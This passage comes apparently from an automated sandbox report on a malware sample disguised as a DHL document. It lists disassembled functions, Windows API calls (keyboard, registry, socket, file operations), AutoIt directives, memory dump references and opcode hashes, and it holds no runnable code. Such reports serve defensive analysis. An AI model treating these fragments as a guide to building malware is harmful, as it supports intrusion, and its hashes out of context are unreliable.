                                                                                    • Instruction Fuzzy Hash: D051C0A0904AD539FF3646348C0ABF6BEADBF0A304F088589E2D4C58D3C6E4D8C5DB51
                                                                                    Function 00810D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetParent.USER32(00000000), ref: 00810DA5
                                                                                    • GetKeyboardState.USER32(?), ref: 00810DBA
                                                                                    • SetKeyboardState.USER32(?), ref: 00810E1B
                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00810E47
                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00810E64
                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00810EA8
                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00810EC9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: 563a4775f8d69094494b547d88152abc2198da6450b80f05786a9d6a416f57f0
                                                                                    • Instruction ID: 591b586b009c02ecff7fcec7c9cdbcda3c9739a2bf5bb7a4ad3b605e66e97973
                                                                                    • Opcode Fuzzy Hash: 563a4775f8d69094494b547d88152abc2198da6450b80f05786a9d6a416f57f0
                                                                                    • Instruction Fuzzy Hash: 5751C1A05086D57DFB3282658C45BFA7EADFF06300F088989E1D4CA8C2D7D5ACD8DB51
                                                                                    Function 008155FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcsncpy$LocalTime
                                                                                    • String ID:
                                                                                    • API String ID: 2945705084-0
                                                                                    • Opcode ID: 7a1ac131a043efa4840c9471823c00b415ae200f575d9306499e343dde445628
                                                                                    • Instruction ID: c23b2c2cd07c7d7a4edc82f7957b7fc2fbe8b6345a8699813e79623438445b43
                                                                                    • Opcode Fuzzy Hash: 7a1ac131a043efa4840c9471823c00b415ae200f575d9306499e343dde445628
                                                                                    • Instruction Fuzzy Hash: A041B565C10218F6CB11EBB4CC4AACFB7BCAF44310F504857E519E3221FA39A296C7E6
                                                                                    Function 00813671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0081466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00813697,?), ref: 0081468B
                                                                                      • Part of subcall function 0081466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00813697,?), ref: 008146A4
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 008136B7
                                                                                    • _wcscmp.LIBCMT ref: 008136D3
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 008136EB
                                                                                    • _wcscat.LIBCMT ref: 00813733
                                                                                    • SHFileOperationW.SHELL32(?), ref: 0081379F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 1377345388-1173974218
                                                                                    • Opcode ID: 89c30107689a4a8e6ab0d205a3e22e7f69fce2f28315e445f89aa22edbbc881e
                                                                                    • Instruction ID: e37298b6134eaa0957b3261ea7f6f03d851554c5efa055a9173e2ea204eb6837
                                                                                    • Opcode Fuzzy Hash: 89c30107689a4a8e6ab0d205a3e22e7f69fce2f28315e445f89aa22edbbc881e
                                                                                    • Instruction Fuzzy Hash: 53416BB1508344AAD751EF64D455AEFB7ECFF99380F00092EB49AC3291EA34D689C752
                                                                                    Function 00837291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 008372AA
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00837351
                                                                                    • IsMenu.USER32(?), ref: 00837369
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008373B1
                                                                                    • DrawMenuBar.USER32 ref: 008373C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 3866635326-4108050209
                                                                                    • Opcode ID: 36b46ca52423f85a2b9c2e91a8da99471f9e6cf6e9f66c11c181253ae28d2b1f
                                                                                    • Instruction ID: 6c5e9f236b7a7384ec57fb3e8fcf84c49247e18b82f29c4dfc14168cdccf55cf
                                                                                    • Opcode Fuzzy Hash: 36b46ca52423f85a2b9c2e91a8da99471f9e6cf6e9f66c11c181253ae28d2b1f
                                                                                    • Instruction Fuzzy Hash: D34125B5A05209EFDB20DF50D884EAABBB8FB48314F548429FD55A7360D770ED50DB90
                                                                                    Function 00830FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00830FD4
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00830FFE
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 008310B5
                                                                                      • Part of subcall function 00830FA5: RegCloseKey.ADVAPI32(?), ref: 0083101B
                                                                                      • Part of subcall function 00830FA5: FreeLibrary.KERNEL32(?), ref: 0083106D
                                                                                      • Part of subcall function 00830FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00831090
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00831058
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                    • String ID:
                                                                                    • API String ID: 395352322-0
                                                                                    • Opcode ID: d8643815ac0d4fd636dc85093be608b8978e981fff63eab38a4d7f86cabbf535
                                                                                    • Instruction ID: e6939287c00645a1785ef5b092e3034da40a8c8df50f6024a4439082d09cacd3
                                                                                    • Opcode Fuzzy Hash: d8643815ac0d4fd636dc85093be608b8978e981fff63eab38a4d7f86cabbf535
                                                                                    • Instruction Fuzzy Hash: 3131E871D01509AFDF199BA4DC99AFFB7BCFF48300F00056AE601E2151EB749E859AA1
                                                                                    Function 008362CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008362EC
                                                                                    • GetWindowLongW.USER32(01226D28,000000F0), ref: 0083631F
                                                                                    • GetWindowLongW.USER32(01226D28,000000F0), ref: 00836354
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00836386
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008363B0
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 008363C1
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008363DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 2178440468-0
                                                                                    • Opcode ID: 9a58d729b0d7f1613a7911f18f526042e6b366bb1a8f6b1354fcd2093e9c5e6d
                                                                                    • Instruction ID: 49365d698811378b4f1db173133c2380ab1854c33eddbb284ac98a8ce549ca12
                                                                                    • Opcode Fuzzy Hash: 9a58d729b0d7f1613a7911f18f526042e6b366bb1a8f6b1354fcd2093e9c5e6d
                                                                                    • Instruction Fuzzy Hash: 9031F331A44151AFDB208F18DC89F553BE1FB9A714F198168F605CF2B2EB71A8909B91
                                                                                    Function 0080DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0080DB2E
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0080DB54
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0080DB57
                                                                                    • SysAllocString.OLEAUT32(?), ref: 0080DB75
                                                                                    • SysFreeString.OLEAUT32(?), ref: 0080DB7E
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0080DBA3
                                                                                    • SysAllocString.OLEAUT32(?), ref: 0080DBB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: b391ae45ec84eb3e67d449ab7fe49041cec87ba570d788c20f20728085fba187
                                                                                    • Instruction ID: 51f4a2b390d5aa3c329bf3e476a84cb677473bebf1cc8976af55b64fc304323e
                                                                                    • Opcode Fuzzy Hash: b391ae45ec84eb3e67d449ab7fe49041cec87ba570d788c20f20728085fba187
                                                                                    • Instruction Fuzzy Hash: 99217F36600219AFDB50AFE8DC88CBB77ACFB09370B018525FE14DB2A1D6749C458BA4
                                                                                    Function 00826173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00827D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00827DB6
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008261C6
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 008261D5
                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0082620E
                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00826217
                                                                                    • WSAGetLastError.WSOCK32 ref: 00826221
                                                                                    • closesocket.WSOCK32(00000000), ref: 0082624A
                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00826263
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 910771015-0
                                                                                    • Opcode ID: 156a6c1df4d490f808c5380c5a9535f6a020d3aa750a4e241361dbdcda0e404b
                                                                                    • Instruction ID: 25c7b0ba3f82c13436432e4bbc57d397b0e4d9ab4fa830d3fcd78a3c763be572
                                                                                    • Opcode Fuzzy Hash: 156a6c1df4d490f808c5380c5a9535f6a020d3aa750a4e241361dbdcda0e404b
                                                                                    • Instruction Fuzzy Hash: 6A319031600128ABDF10AF24DC89BBA77ADFF45724F044429FA05E7292DB74AC548AA1
                                                                                    Function 0080F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                    • API String ID: 1038674560-2734436370
                                                                                    • Opcode ID: 337ff9e72b211045cb373b50cec48b88c714acb4548d61ad4891d11c8a345d39
                                                                                    • Instruction ID: 49d5b825396638615b368cbe8814d6823f9bfc16709f7c561b3f95e4b1ffaae8
                                                                                    • Opcode Fuzzy Hash: 337ff9e72b211045cb373b50cec48b88c714acb4548d61ad4891d11c8a345d39
                                                                                    • Instruction Fuzzy Hash: D3217972204551AAD270A634AC06FB773E8FF65314F10803AFA55C66D3FB999D42C396
                                                                                    Function 0080DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0080DC09
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0080DC2F
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0080DC32
                                                                                    • SysAllocString.OLEAUT32 ref: 0080DC53
                                                                                    • SysFreeString.OLEAUT32 ref: 0080DC5C
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0080DC76
                                                                                    • SysAllocString.OLEAUT32(?), ref: 0080DC84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: ce020c8caece7371cfa098b3624ea5170862bef0ae81cbe4e7890af7d4621f78
                                                                                    • Instruction ID: eff26008b0252204081e204cc3490cb3bc27b0f99156970bc971812fdf677738
                                                                                    • Opcode Fuzzy Hash: ce020c8caece7371cfa098b3624ea5170862bef0ae81cbe4e7890af7d4621f78
                                                                                    • Instruction Fuzzy Hash: 51213035604204AFEB54ABE8DD88DAB77ACFF49360B108525FA14CB2A1DAB4DC45C7A4
                                                                                    Function 008375CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007B1D73
                                                                                      • Part of subcall function 007B1D35: GetStockObject.GDI32(00000011), ref: 007B1D87
                                                                                      • Part of subcall function 007B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007B1D91
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00837632
                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0083763F
                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0083764A
                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00837659
                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00837665
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                    • String ID: Msctls_Progress32
                                                                                    • API String ID: 1025951953-3636473452
                                                                                    • Opcode ID: 4889326f6c478c73baf0bf89c412e5f8bea694eb8ec7530f543bffdf26e897a3
                                                                                    • Instruction ID: dbf1bd6ed8fe4c38d675853e65d0809f721d06568735cc05513506919eec56b0
                                                                                    • Opcode Fuzzy Hash: 4889326f6c478c73baf0bf89c412e5f8bea694eb8ec7530f543bffdf26e897a3
                                                                                    • Instruction Fuzzy Hash: 401190B2110219BFEF159F64CC86EEB7F6DFF48798F014114BA04A20A0DA72DC21DBA4
                                                                                    Function 007D9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __init_pointers.LIBCMT ref: 007D9AE6
                                                                                      • Part of subcall function 007D3187: EncodePointer.KERNEL32(00000000), ref: 007D318A
                                                                                      • Part of subcall function 007D3187: __initp_misc_winsig.LIBCMT ref: 007D31A5
                                                                                      • Part of subcall function 007D3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 007D9EA0
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 007D9EB4
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 007D9EC7
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 007D9EDA
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 007D9EED
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 007D9F00
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 007D9F13
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 007D9F26
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 007D9F39
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 007D9F4C
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 007D9F5F
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 007D9F72
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 007D9F85
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 007D9F98
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 007D9FAB
                                                                                      • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 007D9FBE
                                                                                    • __mtinitlocks.LIBCMT ref: 007D9AEB
                                                                                    • __mtterm.LIBCMT ref: 007D9AF4
                                                                                      • Part of subcall function 007D9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,007D9AF9,007D7CD0,0086A0B8,00000014), ref: 007D9C56
                                                                                      • Part of subcall function 007D9B5C: _free.LIBCMT ref: 007D9C5D
                                                                                      • Part of subcall function 007D9B5C: DeleteCriticalSection.KERNEL32(0086EC00,?,?,007D9AF9,007D7CD0,0086A0B8,00000014), ref: 007D9C7F
                                                                                    • __calloc_crt.LIBCMT ref: 007D9B19
                                                                                    • __initptd.LIBCMT ref: 007D9B3B
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 007D9B42
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                    • String ID:
                                                                                    • API String ID: 3567560977-0
                                                                                    • Opcode ID: e2bdd5a1e7a03d1bf4654377ac69b7a5852d4d5cf22778862421f8eb3abaccfb
                                                                                    • Instruction ID: 994b744120bebb615da7f65a0931b148cdd12f4ecffe58d6a1c90e2479a1fc1b
                                                                                    • Opcode Fuzzy Hash: e2bdd5a1e7a03d1bf4654377ac69b7a5852d4d5cf22778862421f8eb3abaccfb
                                                                                    • Instruction Fuzzy Hash: A9F09672609711A9E7747B74BC0B75A36B1AF42730F214A1BF750C53D2FF68884181A1
                                                                                    Function 007D406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007D3F85), ref: 007D4085
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 007D408C
                                                                                    • EncodePointer.KERNEL32(00000000), ref: 007D4097
                                                                                    • DecodePointer.KERNEL32(007D3F85), ref: 007D40B2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
